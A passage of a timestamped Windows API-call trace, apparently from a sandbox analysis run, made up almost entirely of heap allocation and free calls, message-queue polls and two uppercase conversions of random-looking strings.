dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0128.853] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0128.853] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0128.853] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0128.853] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0128.853] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0128.853] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0128.853] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0128.853] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0128.853] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0128.854] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1c0 | out: hHeap=0x12c0000) returned 1 [0128.860] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd160 | out: hHeap=0x12c0000) returned 1 [0128.860] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0128.860] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0128.860] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0128.860] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fedd0 | out: hHeap=0x12c0000) returned 1 [0128.860] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0128.860] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0128.860] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ac8 [0128.860] CharUpperBuffW (in: lpsz="KGGJMOBCJUETCWRTLNXKZGWSZXBPV", cchLength=0x1d | out: lpsz="KGGJMOBCJUETCWRTLNXKZGWSZXBPV") returned 0x1d [0128.861] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ac8 | out: hHeap=0x12c0000) returned 1 [0128.861] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0128.862] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fedd0 [0128.862] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1) returned 0x12ef880 [0128.862] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0128.862] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd160 [0128.862] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0128.863] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0128.863] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0128.863] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1) returned 0x12ef7b0 [0128.863] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0128.863] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0128.863] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0128.863] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0128.863] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1) returned 0x12ef7e0 [0128.863] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0128.863] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0128.863] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0128.863] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1) returned 0x12ef770 [0128.863] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1c0 [0128.864] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0128.864] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0128.864] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1) returned 0x12ef8b0 [0128.864] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0128.864] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0128.864] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0128.864] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd310 [0128.864] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0128.864] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0128.864] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0128.864] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0128.864] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0128.864] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee98 [0128.865] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0128.865] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef890 [0128.865] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0128.865] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0128.865] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0128.865] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4c0 [0128.865] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0128.865] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd640 [0128.865] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0128.865] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd628 [0128.865] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0128.865] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd400 [0128.865] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0128.865] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd430 [0128.865] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0128.865] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd598 [0128.866] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0128.866] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd448 [0128.866] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0128.866] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0128.866] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6b8 [0128.866] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0128.866] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6b8 | out: hHeap=0x12c0000) returned 1 [0128.866] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0128.866] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0128.866] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd658 [0128.866] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0128.866] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd658 | out: hHeap=0x12c0000) returned 1 [0128.866] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0128.866] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0128.866] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff050 [0128.866] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5b0 [0128.867] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef720 [0128.867] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4d8 [0128.867] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0128.867] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0128.867] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0128.867] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0128.867] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e5c0 [0128.867] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0128.867] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0128.867] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0128.867] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13166c0 [0128.867] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13166c0 | out: hHeap=0x12c0000) returned 1 [0128.867] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0128.867] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0128.867] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dec0 [0128.868] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0128.868] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0128.868] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff2d0 [0128.868] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6b8 [0128.868] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0128.868] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0128.868] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1301068 [0128.868] CharUpperBuffW (in: lpsz="DJVLLWQLKATZJRZPICPARXZ", cchLength=0x17 | out: lpsz="DJVLLWQLKATZJRZPICPARXZ") returned 0x17 [0128.868] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1301068 | out: hHeap=0x12c0000) returned 1 [0128.868] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0128.868] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff028 [0128.868] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1) returned 0x12ef810 [0128.868] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff078 [0128.868] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd520 [0128.869] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0128.869] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd3e8 [0128.869] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0128.869] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1) returned 0x12ef830 [0128.869] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd3d0 [0128.869] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0128.869] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd658 [0128.869] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0128.869] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd5c8 [0128.870] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff000 [0128.870] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5f8 [0128.870] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0128.870] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd460 [0128.870] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4a8 [0128.870] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff2a8 [0128.870] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd568 [0128.870] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6f0 [0128.870] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd910 [0128.870] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b5fa8 [0128.870] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ac8 [0128.870] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.870] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b5fd8 [0128.870] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0128.870] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b5fd8 | out: hHeap=0x12c0000) returned 1 [0128.871] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0128.871] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.871] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b5fd8 [0128.871] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0128.871] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b5fd8 | out: hHeap=0x12c0000) returned 1 [0128.871] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0128.871] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.871] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff3c0 [0128.871] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b5fd8 [0128.871] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0128.871] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6218 [0128.871] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0128.872] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0128.872] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0128.872] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0128.872] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e380 [0128.872] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.872] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0128.872] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0128.872] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13167a0 [0128.872] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13167a0 | out: hHeap=0x12c0000) returned 1 [0128.872] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0128.872] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0128.872] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0128.873] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.873] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff0a0 [0128.873] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6548 [0128.873] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0128.873] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6548 | out: hHeap=0x12c0000) returned 1 [0128.873] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff0c8 [0128.873] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b65c0 [0128.873] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b64d0 [0128.873] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.873] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff1b8 [0128.873] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6758 [0128.873] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0128.874] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6758 | out: hHeap=0x12c0000) returned 1 [0128.874] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1301068 [0128.874] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b67b8 [0128.874] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6740 [0128.874] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0128.874] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6740 | out: hHeap=0x12c0000) returned 1 [0128.874] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0128.874] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.874] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0128.874] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0128.874] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.874] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff1e0 [0128.874] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b66c8 [0128.874] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0128.874] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0128.875] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b64e8 [0128.875] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0128.875] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0128.875] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66c8 | out: hHeap=0x12c0000) returned 1 [0128.875] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b64e8 | out: hHeap=0x12c0000) returned 1 [0128.875] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff1e0 | out: hHeap=0x12c0000) returned 1 [0128.875] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.875] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0128.875] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.875] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0128.875] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0128.875] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13166c0 [0128.875] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13166c0 | out: hHeap=0x12c0000) returned 1 [0128.876] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0128.876] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0128.876] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0128.876] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.876] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0128.876] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.876] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0128.876] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0128.876] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13167a0 [0128.876] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13167a0 | out: hHeap=0x12c0000) returned 1 [0128.876] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0128.876] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0128.876] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e2c0 [0128.876] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.876] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e2c0 | out: hHeap=0x12c0000) returned 1 [0128.876] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.876] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0128.876] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0128.877] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13167a0 [0128.877] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13167a0 | out: hHeap=0x12c0000) returned 1 [0128.877] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0128.877] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0128.877] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0128.877] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.877] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0128.877] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.877] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0128.877] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0128.877] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316880 [0128.877] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316880 | out: hHeap=0x12c0000) returned 1 [0128.878] HeapFree 